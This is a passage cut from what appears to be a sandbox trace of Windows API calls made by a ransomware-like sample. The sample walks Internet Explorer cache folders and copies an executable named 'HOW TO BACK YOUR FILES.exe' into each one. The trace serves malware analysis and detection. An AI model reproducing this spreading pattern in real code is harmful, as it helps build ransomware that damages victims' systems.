ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6ccd53a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6ccd53a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.663] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.663] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.663] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\Recovery", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\Recovery") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\Recovery" [0104.663] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d6cf0 | out: hHeap=0x2b0000) returned 1 [0104.663] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c68 | out: hHeap=0x2b0000) returned 1 [0104.663] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\Recovery") returned 98 [0104.663] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\Recovery" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\Recovery") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\Recovery" [0104.663] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.663] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\Recovery\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\microsoft\\internet explorer\\recovery\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.664] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.664] GetLastError () returned 0x0 [0104.664] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.664] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.664] CloseHandle (hObject=0x120) returned 1 [0104.664] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.664] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.664] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\Recovery\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4ed4ae10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4dc60740, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4dc60740, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.664] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.664] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.665] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\Recovery\\Last Active", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\Recovery\\Last Active") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\Recovery\\Last Active" [0104.665] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f4fc8 | out: hHeap=0x2b0000) returned 1 [0104.665] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c48 | out: hHeap=0x2b0000) returned 1 [0104.665] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\Recovery\\Last Active") returned 110 [0104.665] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\Recovery\\Last Active" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\Recovery\\Last Active") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\Recovery\\Last Active" [0104.665] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.665] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\microsoft\\internet explorer\\recovery\\last active\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.665] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.666] GetLastError () returned 0x0 [0104.666] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.666] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.666] CloseHandle (hObject=0x120) returned 1 [0104.666] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.666] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.666] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6db5fbe0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6cd21660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6cd21660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.666] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.666] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.666] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\Recovery\\Active", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\Recovery\\Active") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\Recovery\\Active" [0104.666] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d6cf0 | out: hHeap=0x2b0000) returned 1 [0104.666] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c68 | out: hHeap=0x2b0000) returned 1 [0104.666] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\Recovery\\Active") returned 105 [0104.666] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\Recovery\\Active" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\Recovery\\Active") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\Recovery\\Active" [0104.666] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.666] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\Recovery\\Active\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\microsoft\\internet explorer\\recovery\\active\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.667] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.667] GetLastError () returned 0x0 [0104.667] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.667] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.667] CloseHandle (hObject=0x120) returned 1 [0104.668] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.668] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.668] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\Recovery\\Active\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4ed70f70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4dc60740, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4dc60740, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.668] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.668] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.668] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\DOMStore", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\DOMStore") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\DOMStore" [0104.668] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0104.668] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c88 | out: hHeap=0x2b0000) returned 1 [0104.668] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\DOMStore") returned 98 [0104.668] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\DOMStore" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\DOMStore") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\DOMStore" [0104.668] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.668] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\DOMStore\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\microsoft\\internet explorer\\domstore\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.669] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.669] GetLastError () returned 0x0 [0104.669] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.669] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.669] CloseHandle (hObject=0x120) returned 1 [0104.669] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.669] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.669] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\DOMStore\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x1d705b70, ftCreationTime.dwHighDateTime=0x1d35d06, ftLastAccessTime.dwLowDateTime=0x6cd21660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6cd21660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.669] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.669] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.670] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\DOMStore\\OWLVMZRC", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\DOMStore\\OWLVMZRC") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\DOMStore\\OWLVMZRC" [0104.670] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ca068 | out: hHeap=0x2b0000) returned 1 [0104.670] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c08 | out: hHeap=0x2b0000) returned 1 [0104.670] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\DOMStore\\OWLVMZRC") returned 107 [0104.670] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\DOMStore\\OWLVMZRC" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\DOMStore\\OWLVMZRC") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\DOMStore\\OWLVMZRC" [0104.670] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.670] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\DOMStore\\OWLVMZRC\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\microsoft\\internet explorer\\domstore\\owlvmzrc\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.670] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.671] GetLastError () returned 0x0 [0104.671] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.671] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.671] CloseHandle (hObject=0x120) returned 1 [0104.671] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.671] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.671] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\DOMStore\\OWLVMZRC\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x1d705b70, ftCreationTime.dwHighDateTime=0x1d35d06, ftLastAccessTime.dwLowDateTime=0x4dc868a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4dc868a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.671] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.671] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.671] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\DOMStore\\FKLUIDU0", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\DOMStore\\FKLUIDU0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\DOMStore\\FKLUIDU0" [0104.671] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d6dd0 | out: hHeap=0x2b0000) returned 1 [0104.671] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c48 | out: hHeap=0x2b0000) returned 1 [0104.671] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\DOMStore\\FKLUIDU0") returned 107 [0104.671] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\DOMStore\\FKLUIDU0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\DOMStore\\FKLUIDU0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\DOMStore\\FKLUIDU0" [0104.671] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.671] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\DOMStore\\FKLUIDU0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\microsoft\\internet explorer\\domstore\\fkluidu0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.672] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.672] GetLastError () returned 0x0 [0104.672] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.672] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.672] CloseHandle (hObject=0x120) returned 1 [0104.673] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.673] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.673] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\DOMStore\\FKLUIDU0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x1d705b70, ftCreationTime.dwHighDateTime=0x1d35d06, ftLastAccessTime.dwLowDateTime=0x4dc868a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4dc868a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.673] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.673] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.673] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\DOMStore\\8NES5H33", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\DOMStore\\8NES5H33") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\DOMStore\\8NES5H33" [0104.673] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d6cf0 | out: hHeap=0x2b0000) returned 1 [0104.673] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c68 | out: hHeap=0x2b0000) returned 1 [0104.673] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\DOMStore\\8NES5H33") returned 107 [0104.673] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\DOMStore\\8NES5H33" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\DOMStore\\8NES5H33") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\DOMStore\\8NES5H33" [0104.673] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.673] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\DOMStore\\8NES5H33\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\microsoft\\internet explorer\\domstore\\8nes5h33\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.674] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.674] GetLastError () returned 0x0 [0104.674] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.674] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.674] CloseHandle (hObject=0x120) returned 1 [0104.674] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.674] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.674] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\DOMStore\\8NES5H33\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x1d705b70, ftCreationTime.dwHighDateTime=0x1d35d06, ftLastAccessTime.dwLowDateTime=0x4dc868a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4dc868a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.674] 